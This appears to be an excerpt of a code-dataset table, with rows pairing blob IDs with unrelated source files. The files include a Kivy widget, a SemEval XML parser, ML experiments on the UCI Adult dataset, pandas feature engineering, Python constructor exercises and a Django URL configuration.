index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
18,300 | 151cead9befe305e5370a2ace563c24e45b7dd8b | from kivy.uix.boxlayout import BoxLayout
from kivy.properties import ObjectProperty
from kivy.lang import Builder
Builder.load_string("""
<MenuButtonWidget>:
Button:
text: 'Menu'
on_press: root.miniGameWidget.on_press_menu()
""")
class MenuButtonWidget(BoxLayout):
miniGameWidget = ObjectProperty()
|
18,301 | 9764b810687bb91f220874a4a169fe7b25ccdb66 | try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
from enum import Enum
import re
from itertools import chain
id_classification = Enum('id_classification', 'org rel com none')
#############################
# defining pseudo constants #
#############################
"""The following regex, though hard to look at, perform the simple task of capturing:
- the original id,
- the related id,
- and the comment id.
Examples:
- 'Q4' matches the groups ('Q4', None, None)
- 'Q4_R8' matches the groups ('Q4', 'R8', None)
- 'Q4_R8_C154' matches the groups ('Q4', 'R8', 'C154')
- 'R8' does not match
"""
ID_EXTRACTION_REGEX = r'(Q[0-9]+)(?:_(R[0-9]+)(?:_(C[0-9]))?)?'
##################################
# helper functions to xmlextract #
##################################
def classify_id(identifier):
"""Gives information about an id.
Parameters
----------
identifier : str
The identifier to classify.
Returns
-------
out : tuple
The classification of the identifier,
the first element being the classification proper and
the next three elements are:
- the org fragment (ex Q268),
- the rel fragment (ex _R4), and
- the comment fragment (ex _C2).
"""
match = re.match(ID_EXTRACTION_REGEX, identifier)
if match:
result = match.groups()
group_number = 0
for i in result:
if i is not None:
# there must be a better way to get the number of non None elements in a tuple
group_number += 1
if group_number == 1:
return (id_classification.org, ) + result
if group_number == 2:
return (id_classification.rel, ) + result
if group_number == 3:
return (id_classification.com, ) + result
return (id_classification.none,)
##############################
# semeval element retrievers #
##############################
def get_orgquestion_content(orgquestion):
"""Retrieve the content of an original question element.
That is to say the textual content of both the subject and the body.
Parameters
----------
orgquestion : ET.Element
The original question from which to get the text.
Returns
-------
out : str
The textual content of the original question.
"""
return '. '.join(
[orgquestion.find(tag).text
if orgquestion.find(tag).text is not None else ''
for tag in ['OrgQSubject', 'OrgQBody']
]
)
def get_relquestion_content(relquestion):
"""Retrieve the content of an related question element.
That is to say the textual content of both the subject and the body.
Parameters
----------
relquestion : ET.Element
The related question from which to get the text.
Returns
-------
out : str
The textual content of the related question.
"""
return '. '.join(
[relquestion.find(tag).text
if relquestion.find(tag).text is not None else ''
for tag in ['RelQSubject', 'RelQBody']
]
)
def get_relcomment_content(relcomment):
"""Retrieve the content of an related comment element.
That is to say its textual content.
Parameters
----------
relcomment : ET.Element
The related comment from which to get the text.
Returns
-------
out : str
The textual content of the related comment.
"""
return relcomment.find('RelCText').text
def get_semeval_content(element):
"""Retrieve the content of a semeval element.
That is to say the textual content of the both the subject and the body.
Parameters
----------
element : ET.Element
The original question, related question or related comment to get the text from.
Returns
-------
out : str
The text of the element.
"""
if element.tag == 'OrgQuestion':
return get_orgquestion_content(element)
if element.tag == 'RelQuestion':
return get_relquestion_content(element)
if element.tag == 'Thread':
return get_relquestion_content(element.find('./RelQuestion'))
if element.tag == 'RelComment':
return get_relcomment_content(element)
return None
def get_semeval_content_with_relcomments(element):
"""Retrieve the content of a semeval element, related comment included.
That is to say an original question will return the textual content of the subject and the body whereas a related thread will return the textual content of the subject, the body and the comment.
For consistency's sake, if the element is a comment, its content will still be returned.
None is returned if the element is a related question.
Parameters
----------
element : ET.Element
The original question, related question or related comment to get the text from.
Returns
-------
out : str
The text of the element.
"""
if element.tag == 'OrgQuestion':
return get_orgquestion_content(element)
if element.tag == 'Thread':
return ' '.join(chain(
[get_relquestion_content(element.find('./RelQuestion'))],
[get_relcomment_content(comment)
for comment in element.findall('./RelComment')]
))
if element.tag == 'RelComment':
return get_relcomment_content(element)
return None
def get_semeval_id(element):
"""Retrieve the id of a semeval element.
Parameters
----------
element : ET.Element
The original question, related question or related comment from which to extract the id.
Returns
-------
out : str
The id of the element.
"""
translation = {'OrgQuestion': 'ORGQ_ID',
'RelQuestion': 'RELQ_ID',
'RelComment': 'RELC_ID',
'Thread': 'THREAD_SEQUENCE'}
if element.tag in translation.keys():
return element.attrib[translation[element.tag]]
return None
def get_semeval_relevance_orgq(element):
"""Retrieve the relevance of a semeval element, in regards with its original question.
Parameters
----------
element : ET.Element
The related question or related comment from which to get the relevance.
Returns
-------
out : str
The relevance of the element.
"""
if element.tag == 'RelQuestion':
return element.attrib['RELQ_RELEVANCE2ORGQ']
if element.tag == 'RelComment':
return element.attrib['RELC_RELEVANCE2ORGQ']
return None
RELEVANT_TAGS = {'Good', 'PerfectMatch'}
def is_relevant_to_orgq(element):
"""Check if a semeval element is relevant to its original question.
Parameters
----------
element : ET.Element
The related question or related comment.
Returns
-------
out : boolean
True if the element is relevant.
"""
relevance = get_semeval_relevance_orgq(element)
return relevance in RELEVANT_TAGS
def get_related_questions(element):
"""Retrieve the related question from an element.
This element can be:
- original question
- related question (returns itself)
- thread
- full tree
Parameters
----------
element : ET.element
The element from wich to extract the related questions.
Returns
-------
out : list of ET.element
"""
tag2path = {
'OrgQuestion': './Thread/RelQuestion',
'Thread': './RelQuestion',
'RelQuestion': '.',
}
if element.tag in tag2path:
return element.findall(tag2path[element.tag])
return element.findall('./OrgQuestion/Thread/RelQuestion')
def get_related_threads(element):
"""Retrieve the related threads from an element.
This element can be:
- original question
- related thread (returns itself)
- full tree
Parameters
----------
element : ET.element
The element from wich to extract the related thread.
Returns
-------
out : list of ET.element
"""
tag2path = {
'OrgQuestion': './Thread',
'Thread': '.',
}
if element.tag in tag2path:
return element.findall(tag2path[element.tag])
return element.findall('./OrgQuestion/Thread')
class xmlextract(object):
"""Open an xml from semeval and allow to easily extract informations from it.
Most methods in this module return an ElementTree object, with the notable exception of the *ids methods and of get_all_text.
"""
def __init__(self, xml_filename):
"""Initialize the extractor.
Parameters
----------
xml_filename : str
The name of the source file.
"""
self.source = xml_filename
self.tree = ET.parse(self.source)
self.root = self.tree.getroot()
self.merge_original_questions()
def merge_original_questions(self):
"""Merges together the subtrees of original questions sharing the same IDs.
The original structure looks like
Root
|
|__OrgQuestion<Org_ID1>
| |
| |__(subject and body)
| |
| |__Thread<Thread_ID1>
| |
| |__RelQuestion
| | |
| | |__...
| |
| |__RelComment +
| |__...
|
|__OrgQuestion<Org_ID1> # Same original question
| |
| ...
| |
| |__Thread<Thread_ID2> # New thread
| |
... ...
The merged structure looks like
Root
|
|__Orgquestion<ID1>
| |
| |__(subject and body)
| |
| |__Thread<Thread_ID1>
| | |
| | ...
| |
| |__Thread<Thread_ID2> # The threads are now gathered at the same level
| | |
| | ...
| ...
|
|__OrgQuestion<ID2> # Next original question
| |
| ...
...
"""
self.merged_tree = ET.ElementTree()
self.merged_root = self.root
ids_encountered = set()
for org_question in self.merged_root.findall('./OrgQuestion'):
org_id = org_question.attrib['ORGQ_ID']
if org_id not in ids_encountered:
current_subtree = org_question # works because assignment has reference semantics
ids_encountered.add(org_id)
else:
current_subtree.append(org_question.find('./Thread'))
self.root.remove(org_question)
self.merged_tree._setroot(self.merged_root)
def get_org_questions_ids(self):
"""Retrieve the original questions' IDs.
Returns
-------
out : list of str
The list of the original questions IDs.
"""
return [q.attrib['ORGQ_ID'] for q in self.merged_root.findall('OrgQuestion')]
#######################
# elements extraction #
#######################
def get_org_elements(self):
"""Retrieve the elements of the original questions.
Returns
-------
out : list of ET.element
"""
return self.merged_root.findall('OrgQuestion')
def get_rel_elements(self):
"""Retrieve the elements of the related questions.
Returns
-------
out : list of ET.element
"""
return self.merged_root.findall('OrgQuestion/Thread/RelQuestion')
#######################################
# retrieve specific elements from ids #
#######################################
def get_org_question(self, org_id):
"""Retrieve an original question using its id.
Parameters
----------
org_id : str
The ID of the original question.
Returns
-------
out : ET.Element
The original question element if found, None otherwise.
"""
for question in self.merged_root.iter('OrgQuestion'):
if question.attrib['ORGQ_ID'] == org_id:
return question
return None
def get_rel_thread(self, org_id, rel_id):
"""Retrieve a related thread using its original ID and its related ID.
Parameters
----------
org_id : str
The original ID of the thread.
rel_id : str
The related ID of the thread.
Returns
-------
out : ET.Element
The related thread element if found, None otherwise.
"""
for thread in self.get_org_question(org_id).iter('Thread'):
if thread.attrib['THREAD_SEQUENCE'] == org_id + "_" + rel_id:
return thread
return None
def get_rel_question(self, org_id, rel_id):
"""Retrieve a related question using its original ID and its related ID.
Parameters
----------
org_id : str
The original ID of the question.
rel_id : str
The related ID of the question.
Returns
-------
out : ET.Element
The related question element if found, None otherwise.
"""
return self.get_rel_thread(org_id, rel_id).find('./RelQuestion')
def get_rel_comment(self, org_id, rel_id, com_id):
"""Retrieve a related comment using its original ID, its related ID and its comment ID.
Parameters
----------
org_id : str
The original ID of the comment.
rel_id : str
The related ID of the comment.
com_id : str
The comment ID of the comment.
Returns
-------
out : ET.Element
The related comment element if found, None otherwise.
"""
for comment in self.get_rel_thread(org_id, rel_id).iter('RelComment'):
if comment.attrib['RELC_ID'] == org_id + '_' + rel_id + '_' + com_id:
return comment
return None
#################################
# retrieve any element from ids #
#################################
def get_element_from_id(self, identifier):
"""Retrieve an element from its ID.
The element in question can either be an original question, a related question or a related comment.
Parameters
----------
identifier : str
ID of the element (corresponding to an ORGQ_ID, RELQ_ID or RELC_ID).
Returns
-------
out : ET.Element
The asked-for element if it was found, None otherwise.
"""
classification, org, rel, com = classify_id(identifier)
if classification == id_classification.org:
return self.get_org_question(org)
elif classification == id_classification.rel:
return self.get_rel_question(org, rel)
elif classification == id_classification.com:
return self.get_rel_comment(org, rel, com)
return None
###########################
# extracting path from id #
###########################
def findall_path_from_org_id(self, path, org_id):
"""Retrieve instances of an xml path from the tree of an original question, identified by its ID.
Parameters
----------
path : str
XML path to extract.
org_id : str
ID of the original question.
Returns
-------
out : list of ET.Element
The list of elements matching the path and the original question ID.
"""
for org_question in self.merged_root.iter('OrgQuestion'):
if org_question.attrib['ORGQ_ID'] == org_id:
extraction = org_question.findall(path)
if len(extraction) != 0:
return extraction
return list()
def find_path_from_org_id(self, path, org_id):
"""Retrieve the first xml path from the tree of an original question, identified by its ID.
Parameters
----------
path : str
XML path to extract.
org_id : str
ID of the original question.
Returns
-------
out : ET.Element
The first element matching the path and the original question ID.
"""
for org_question in self.merged_root.iter('OrgQuestion'):
if org_question.attrib['ORGQ_ID'] == org_id:
extraction = org_question.find(path)
if extraction is not None:
return extraction # only returns if a path was found
return None
###################
# text extraction #
###################
def get_all_text(self):
"""Retrieve all the textual contents from the source file.
This includes :
- The original subject.
- The original body.
- The related subject.
- The related body.
- The related comments.
Returns
-------
out : list of str
The list of all the textual contents.
"""
result = list()
for path in ['./OrgQuestion/OrgQSubject',
'./OrgQuestion/OrgQBody',
'./OrgQuestion/Thread/RelQuestion/RelQSubject',
'./OrgQuestion/Thread/RelQuestion/RelQBody',
'./OrgQuestion/Thread/RelComment/']:
result.extend([
element.text if element.text is not None else '' for element in self.merged_root.findall(path)
]) # extract text from each element matching the path
return result
|
18,302 | e421b88948f03b77bbaf5f042a6e4e586ee73854 | a=input()
import math
x=math.fmod(a,1.5)
print round(x*x*x-2.25*x,1)
|
18,303 | 3982608cf0be3033c8a4241333c1829f9d80ff4a | import sys
import numpy as np
import json
from chimerge import ChiMerge
from chi2 import Chi2
import utils
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import StratifiedKFold
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
def sparse_to_matrix(data):
n = len(data)
vals = list(set([x for g in data for x in g]))
fea2idx = {v: vals.index(v) for v in vals}
m = len(vals)
X = np.zeros((n, m))
for i in range(n):
g = data[i]
for v in g:
idx = fea2idx[v]
X[i, idx] = 1
return X
def output_matrix(data, Y):
for i in range(data.shape[0]):
ptr = []
for j in range(data.shape[1]):
ptr.append(data[i,j])
print '\t'.join(map(str, ptr)) + '\t' + str(Y[i,0])
def output_case(data, feature_names, label):
data = np.asarray(data).flatten()
print data
L = len(feature_names)
ptr = {}
for i in range(L):
ptr[feature_names[i]] = data[i]
for k, v in ptr.items():
if v != 0:
print str(k) + ':' + str(v),
print label
def feature_importance_learning(dataTrain, labelTrain, feature_names, cut_ratio):
'''
LR, RF
'''
n_folds = 3
feature_candidates = {}
features_learned = {}
depth = 40
for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(labelTrain).flatten(), n_folds=n_folds, shuffle=True)):
X_train, X_test = dataTrain[train_index], dataTrain[test_index]
y_train, y_test = labelTrain[train_index], labelTrain[test_index]
clf = RandomForestClassifier(max_depth=depth, random_state=0)
clf.fit(X_train, y_train)
for i in range(len(feature_names)):
features_learned[feature_names[i]] = clf.feature_importances_[i]
feature_num = len(feature_names)
cut_number = int(feature_num * cut_ratio)
feature_candidates = utils.sortDictByValue(features_learned, True)
print 'Features numbers: ', feature_num, 'Now: ', cut_number
features = [x[0] for x in feature_candidates[:cut_number]]
return features
def process_adult_trad(attribute_column, min_expected_value, max_number_intervals, threshold, debug_info):
attributes = [('age', 'i8'), ('workclass', 'S40'), ('fnlwgt', 'i8'), ('education', 'S40'), ('education-num', 'i8'), ('marital-status', 'S40'), ('occupation', 'S40'), ('relationship', 'S40'), ('race', 'S40'), ('sex', 'S40'), ('capital-gain', 'i8'), ('capital-loss', 'i8'), ('hours-per-week', 'i8'), ('native-country', 'S40'), ('pay', 'S40')]
datatype = np.dtype(attributes)
# BOW model
data, Y, feature_names = _readAdultDataSet(attribute_column, attributes)
n_folds = 3
#dataTrain = np.asarray(data)
#labelTrain = np.asarray(Y)
#for cut_ratio in [0.2, 0.4, 0.6, 0.8, 1]:
for cut_ratio in [1]:
feature_selected = feature_importance_learning(np.asarray(data), np.asarray(Y), feature_names, cut_ratio)
data_idx = []
for i in range(len(feature_names)):
if feature_names[i] in feature_selected:
data_idx.append(i)
data_selected = data[:, data_idx]
dataTrain = np.asarray(data_selected)
labelTrain = np.asarray(Y)
alphas = [0.5, 1, 5, 10, 100]
#alphas = [10, 20, 50, 200]
for alpha in alphas:
score_train = []
score_test = []
for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(Y).flatten(), n_folds=n_folds, shuffle=True)):
#clf = SVC(class_weight='balanced', kernel='linear', C=alpha)
#clf = RandomForestClassifier(max_depth=alpha, random_state=0)
clf = LogisticRegression(penalty='l2', C=alpha)
#clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(100, 5), random_state=1)
X_train, X_test = dataTrain[train_index], dataTrain[test_index]
y_train, y_test = labelTrain[train_index], labelTrain[test_index]
clf.fit(X_train, y_train)
pred_train = clf.predict(X_train)
pred_test = clf.predict(X_test)
score_train.append(metrics.accuracy_score(y_train, pred_train))
score_test.append(metrics.accuracy_score(y_test, pred_test))
"""
class_coefs1 = {}
print clf.coef_.shape
for i in range(clf.coef_.shape[1]):
class_coefs1[feature_names[i]] = clf.coef_[0, i]
sorted_class_coefs1 = utils.sortDictByValue(class_coefs1, True)
print sorted_class_coefs1
"""
"""
for i in range(len(y_train)):
if y_train[i] != pred_train[i]:
output_case(data[i,:], feature_names, y_train[i])
"""
print 'cut_ratio:', cut_ratio, 'alpha:', alpha, 'Average accuracy, train: ', 1.*sum(score_train)/len(score_train), 'test: ', 1.*sum(score_test)/len(score_test)
def process_adult_bml(attribute_column, min_expected_value, max_number_intervals, threshold, debug_info, mode='SK'):
attributes = [('age', 'i8'), ('workclass', 'S40'), ('fnlwgt', 'i8'), ('education', 'S40'), ('education-num', 'i8'), ('marital-status', 'S40'), ('occupation', 'S40'), ('relationship', 'S40'), ('race', 'S40'), ('sex', 'S40'), ('capital-gain', 'i8'), ('capital-loss', 'i8'), ('hours-per-week', 'i8'), ('native-country', 'S40'), ('pay', 'S40')]
datatype = np.dtype(attributes)
chi = ChiMerge(min_expected_value, max_number_intervals, threshold, debug_info)
# BOW model
data, Y, feature_names = _readAdultDataSet(attribute_column, attributes)
# Chimerge
discretizationIntervals = {}
discretizationDtype = []
for i in range(data.shape[1]):
chiData = np.concatenate((data[:,i], Y), axis=1)
chi.loadData(chiData, False)
chi.generateFrequencyMatrix()
chi.chimerge()
#chi.printDiscretizationInfo(feature_names[i])
discretizationIntervals[feature_names[i]] = chi.frequency_matrix_intervals
discretizationDtype.append((feature_names[i], 'i8'))
# addfeatures
from addfeatures import AddFeatures
af_model = AddFeatures()
X_parsed = []
for i in range(data.shape[0]):
input_stream = np.zeros((1,),dtype=object)
input_stream[0] = np.asarray(data[i,:])
X_slots = af_model.fit_transform(data=input_stream, dttyp=np.dtype(discretizationDtype), discret_intervals=discretizationIntervals)
X_parsed.append(X_slots)
"""
dv = DictVectorizer(sparse=False)
dataTrain = dv.fit_transform(X_parsed)
labelTrain = Y[:,0]
"""
# fm training
#print af_model.reversed_table
ori_features_len = len(set(af_model.reversed_table.keys()))
parsed_features_len = len(set(af_model.reversed_table.values()))
print "Features space transforms from %d-dim to %d-dim" % (ori_features_len, parsed_features_len)
dataTrain = sparse_to_matrix(X_parsed)
labelTrain = Y[:,0]
output_matrix(dataTrain, labelTrain)
sys.exit(0)
"""
for i in range(dataTrain.shape[0]):
for j in range(dataTrain.shape[1]):
print dataTrain[i,j],
print ''
"""
# kfold validation
from factorization_machine import FactorizationMachineClassification
from sklearn.svm import SVC
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.cross_validation import StratifiedKFold
n_folds = 3
# This following models contains Sklearn models and FM model, pick one
# SK models
if mode == 'SK':
alphas = [0.5, 1, 5, 10, 100, 1000]
for alpha in alphas:
score_train = []
score_test = []
for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(labelTrain).flatten(), n_folds=n_folds, shuffle=True)):
#clf = SVC(class_weight='balanced', kernel='rbf', C=alpha)
clf = LogisticRegression(penalty='l1', C=alpha)
#clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(100, 3), random_state=1, max_iter=1000)
X_train, X_test = dataTrain[train_index], dataTrain[test_index]
y_train, y_test = labelTrain[train_index], labelTrain[test_index]
clf.fit(X_train, y_train)
pred_train = clf.predict(X_train)
pred_test = clf.predict(X_test)
score_train.append(metrics.accuracy_score(y_train, pred_train))
score_test.append(metrics.accuracy_score(y_test, pred_test))
print 'alpha:', alpha, 'Average accuracy, train: ', 1.*sum(score_train)/len(score_train), 'test: ', 1.*sum(score_test)/len(score_test)
elif mode == 'FM':
# FM model
fm = FactorizationMachineClassification()
for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(labelTrain).flatten(), n_folds=n_folds, shuffle=True)):
X_train, X_test = dataTrain[train_index], dataTrain[test_index]
y_train, y_test = labelTrain[train_index], labelTrain[test_index]
#w0, w, v = fm.fit_and_validate(np.mat(X_train), y_train, np.mat(X_test), y_test, 3, 10000, 0.01, True)
w0, w, v = fm.fit_and_validate(np.mat(X_train), y_train, np.mat(X_test), y_test, 3, 10000, 0.01)
break
else:
print 'Pick a mode [SK|FM]'
def _readAdultDataSet(attribute_column=-1, attributes=None):
"""
Reference: http://archive.ics.uci.edu/ml/machine-learning-databases/adult/
e.g. 39, State-gov, 77516, Bachelors, 13, Never-married, Adm-clerical, Not-in-family, White, Male, 2174, 0, 40, United-States, <=50K
>50K, <=50K.
age: continuous.
workclass: Private, Self-emp-not-inc, Self-emp-inc, Federal-gov, Local-gov, State-gov, Without-pay, Never-worked.
fnlwgt: continuous.
education: Bachelors, Some-college, 11th, HS-grad, Prof-school, Assoc-acdm, Assoc-voc, 9th, 7th-8th, 12th, Masters, 1st-4th, 10th, Doctorate, 5th-6th, Preschool.
education-num: continuous.
marital-status: Married-civ-spouse, Divorced, Never-married, Separated, Widowed, Married-spouse-absent, Married-AF-spouse.
occupation: Tech-support, Craft-repair, Other-service, Sales, Exec-managerial, Prof-specialty, Handlers-cleaners, Machine-op-inspct, Adm-clerical, Farming-fishing, Transport-moving, Priv-house-serv, Protective-serv, Armed-Forces.
relationship: Wife, Own-child, Husband, Not-in-family, Other-relative, Unmarried.
race: White, Asian-Pac-Islander, Amer-Indian-Eskimo, Other, Black.
sex: Female, Male.
capital-gain: continuous.
capital-loss: continuous.
hours-per-week: continuous.
native-country: United-States, Cambodia, England, Puerto-Rico, Canada, Germany, Outlying-US(Guam-USVI-etc), India, Japan, Greece, South, China, Cuba, Iran, Honduras, Philippines, Italy, Poland, Jamaica, Vietnam, Mexico, Portugal, Ireland, France, Dominican-Republic, Laos, Ecuador, Taiwan, Haiti, Columbia, Hungary, Guatemala, Nicaragua, Scotland, Thailand, Yugoslavia, El-Salvador, Trinadad&Tobago, Peru, Hong, Holand-Netherlands.
:return:
"""
if attribute_column < -1 or attribute_column > 15:
return
if attribute_column== -1:
attribute_columns = range(15)
else:
attribute_columns = [attribute_column]
if attributes == None:
return
datatype = np.dtype(attributes)
#pathfn = 'adult/adult.data'
pathfn = 'adult/adult.small'
#pathfn = 'adult/adult.1w'
data = []
Y = []
with open(pathfn, 'r') as f:
for line in f:
tmpdict = {}
tmp = line.replace(' ', '').replace(':', '-').strip().split(',')
tmp = np.array(tuple(tmp), dtype=datatype)
for g in attributes:
typ = g[0]
value = tmp[typ]
if g[0] == 'pay' and value == '>50K':
Y.append(1)
elif g[0] == 'pay' and value == '<=50K':
Y.append(-1)
elif value.dtype == np.dtype('S40'):
#tag = str(typ) + BaseC.DISCRET_DELIMITER + str(value)
tag = utils.mergeKeyValue(str(typ), str(value), 'discret')
tmpdict[tag] = 1
else:
tmpdict[typ] = value
data.append(tmpdict)
dv = DictVectorizer(sparse=False)
X = dv.fit_transform(data)
return np.matrix(X, dtype='i8'), np.matrix(Y).T, dv.get_feature_names()
# ChiMerge paper: https://www.aaai.org/Papers/AAAI/1992/AAAI92-019.pdf
if __name__ == '__main__':
process_adult_bml(attribute_column=-1, min_expected_value=0.5, max_number_intervals=15, threshold=4.61, debug_info=False, mode='SK')
#process_adult_trad(attribute_column=-1, min_expected_value=0.5, max_number_intervals=6, threshold=4.61, debug_info=False)
|
18,304 | bbd0e59808a55c79bdce5ce95049683785caf51c | '''
根据会员用户的兴趣特征,构建如下字段:
购物季节:春天、夏天、秋天、冬天
购物时间段:凌晨、上午、中午、下午、晚上
构建的特征保存在“task3_3.csv”文件中
'''
import pandas as pd
data = pd.read_csv('../../data/task3_2.csv')
task1 = pd.read_csv('../../data/会员购物情况表.csv',low_memory=False)
print(data.shape) #(142701, 9)
print(task1.shape) #(1013660, 12)
#购物季节
task1['消费时间'] = pd.to_datetime(task1['消费时间'])
task1['季节'] = pd.cut(task1['消费时间'].dt.month,
bins=[0,2,5,8,11,13],
labels=['冬天','春天','夏天','秋天','冬'])
task1.loc[task1['季节']=='冬','季节'] = '冬天'
df = task1[['会员卡号','季节']].groupby(by='会员卡号').max()
data = pd.merge(data,df,on='会员卡号',how='left')
#购物时间段
task1['购物时间段'] = pd.cut(task1['消费时间'].dt.hour,
bins=[0,6,11,14,18,24],
labels=['凌晨','上午','中午','下午','晚上'])
task1.drop(task1[task1['购物时间段'].isnull().values==True].index,inplace=True)
df1 = task1[['会员卡号','购物时间段']].groupby(by='会员卡号').max()
data = pd.merge(data,df1,on='会员卡号',how='left')
#保存
data.to_csv('../../data/task3_3.csv',index=False) |
18,305 | b23c8a42bae149d6a49fe5aa178407890ff06e40 | #1.
class defaultcon:
# default constructor
def __init__(self):
self.geek = "defaultconstructor"
# a method for printing data members
def print_defaultcon(self):
print(self.geek)
obj = defaultcon()
# calling the instance method using the object obj
obj.print_defaultcon()
class Addition:
first = 0
second = 0
answer = 0
# parameterized constructor
def __init__(self, f, s):
self.first = f
self.second = s
def display(self):
print("First number = " + str(self.first))
print("Second number = " + str(self.second))
print("Addition of two numbers = " + str(self.answer))
def calculate(self):
self.answer = self.first + self.second
# creating object of the class
# this will invoke parameterized constructor
obj = Addition(1000, 2000)
# perform Addition
obj.calculate()
# display result
obj.display()
class sub():
first=0
def __init__(self,f):
self.first=f
def displayresult(self):
print('number is',self.first)
obj1=sub(100)
obj1.displayresult()
#2..
class defaultcon:
def __init__(self):
print('defaultconstructor')
#self.geek = "defaultconstructor"
# a method for printing data members
def print_defaultcon(self):
print('defaultconstructor1')
class sub(defaultcon):
first=0
def __init__(self,f):
self.first=f
def displayresult(self):
print('number is',self.first)
class exsub(sub):
second=0
def __init__(self,y):
sub.__init__(self,y)
self.second=y
def dis(self):
print('number2 is',self.second)
obj = exsub(100)
# calling the instance method using the object obj
obj.displayresult()
obj.print_defaultcon()
obj.dis()
#3.. w to create public,private, protected and default modifiers to the constructor
class Geek:
def __init__(self, name, age):
self.geekName = name
self.geekAge = age
# public memeber function
def displayAge(self):
print("Age: ", self.geekAge)
obj = Geek("usha", 20)
print("Name: ", obj.geekName)
obj.displayAge()
# protected acces modifiers
class Student:
# protected data members
_name = None
_roll = None
_branch = None
# constructor
def __init__(self, name, roll, branch):
self._name = name
self._roll = roll
self._branch = branch
# protected member function
def _displayRollAndBranch(self):
print("Roll: ", self._roll)
print("Branch: ", self._branch)
# derived class
class Geek(Student):
def __init__(self, name, roll, branch):
Student.__init__(self, name, roll, branch)
def displayDetails(self):
print("Name: ", self._name)
self._displayRollAndBranch()
obj = Geek("usha", 256, "cse")
obj.displayDetails()
# private acces modifliers
class Student:
# protected data members
__name = None
__roll = None
__branch = None
# constructor
def __init__(self, name, roll, branch):
self.__name = name
self.__roll = roll
self.__branch = branch
# protected member function
def __displayRollAndBranch(self):
print("Name: ", self.__name)
print("Roll: ", self.__roll)
print("Branch: ", self.__branch)
def displayDetails(self):
self.__displayRollAndBranch()
obj = Student("usharani", 256, "IT")
obj.displayDetails()
#4. write constuctors with return type int and string
class Addition:
first = 0
second = 0
answer = 0
# parameterized constructor
def __init__(self, f, s):
self.first = f
self.second = s
def display(self):
print("First number = " + str(self.first))
print("Second number = " + str(self.second))
print("First number = ",int(self.first))
print("Second number = ",int(self.second))
# creating object of the class
# this will invoke parameterized constructor
obj = Addition(1000, 2000)
obj.display()
#5.try to call the constructor multiple times with the same object
class new:
def __init__(self):
print('constructor is created')
a=new()
a=new()
a=new()
a=new()
|
18,306 | 0862c4fc4e074aca898cfec74220e6a9030a6db0 | from functools import reduce
SEPARATOR = '^#$'
def code(function_name, kwargs_dict):
return function_name + SEPARATOR + \
reduce(lambda a, b: SEPARATOR + a + SEPARATOR + b, [k + v for k, v in kwargs_dict.items()])
def recode(coded_str):
splited_list = coded_str.split(SEPARATOR)
function_name = splited_list[0]
if len(splited_list) == 1:
return function_name, {}
else:
kwargs_dict = {}
for i in range((len(splited_list)-1)/2):
kwargs_dict[splited_list[2*i]] = splited_list[2*i + 1]
return function_name, kwargs_dict |
18,307 | f4b5767cf63723ee77fcb8f2e063806c5fa40b40 | ##adicionei - Serve para importar arquivos em outro diretório
import sys
sys.path.append('/home/gmarson/Git/AnaliseDeAlgoritmos/Trabalho_Final/Codigos/Insertion')
from monitor import *
from InsertionSort import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("n", type=int, help="número de elementos no vetor de teste")
args = parser.parse_args()
v = criavet(args.n)
insertionSort(v)
## A EXECUÇÃO DESSE ARQUIVO EH ASSIM
## NA LINHA DE COMANDO VC MANDA O NOME DO ARQUIVO E O TAMANHO DO ELEMNTO DO vetor
##EXEMPLO testeBubble.py 10
##ele gera um vetor aleatório (criavet) e manda pro bubble_sort
|
18,308 | 393a1e8c670458f70d53b90f08810e43cedb1ac0 | from decompy.EquivalencyClasses.Tokenizers.Tokens.Token import Token
class PositiveIntegerToken(Token):
def __init__(self):
Token.__init__(self)
self._value = None
def reset(self):
self._value = None
def value(self):
if not self._value:
raise AttributeError("Cannot resolve an unassigned numeric token")
return self._value
def __eq__(self, other):
if self._value:
return other == self._value
if isinstance(other, int):
self._value = other
return True
elif isinstance(other, str):
for char in other:
if char not in "0123456789":
return False
self._value = int(other)
return True
elif isinstance(other, int):
return True
return False
def __str__(self):
return "<Unknown Integer: %s>" % hex(id(self))
if __name__ == "__main__":
a = PositiveIntegerToken()
b = PositiveIntegerToken()
def result():
try:
print("Token value:", Token.resolve(token))
except AttributeError as e:
print("Token value: unassigned")
for token in [a, a, 5, b]:
result()
print("Compare token to int 4", token == 4)
result()
print("Compare token to int 5", token == 5)
|
18,309 | 1998882d5d85d6b2a99fe1762fb0768a4009fc08 | """Ask URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from MalyshevAsk import views as ask_views
urlpatterns = [
url(r'^vote/?', ask_views.vote),
url(r'^correct/?', ask_views.correct),
url(r'^logout/?', ask_views.logout, name = "logout"),
url(r'^admin/?', admin.site.urls),
url(r'^index/?', ask_views.index, name = "index"),
url(r'^login/?', ask_views.login, name = "login"),
url(r'^signup/?', ask_views.signup, name = "signup"),
url(r'^personal_page/?', ask_views.personal_page, name = "personal_page"),
url(r'^ask/?', ask_views.ask, name = "ask"),
url(r'^question/(?P<qid>\d+)', ask_views.question, name = "question"),
url(r'^searchByTag/?', ask_views.searchByTag, name = "tag"),
url(r'^getPostParameters/?.*', ask_views.getPostParameters),
url(r'^hot/?', ask_views.hot),
url(r'^/?', ask_views.index, name = "index")
] |
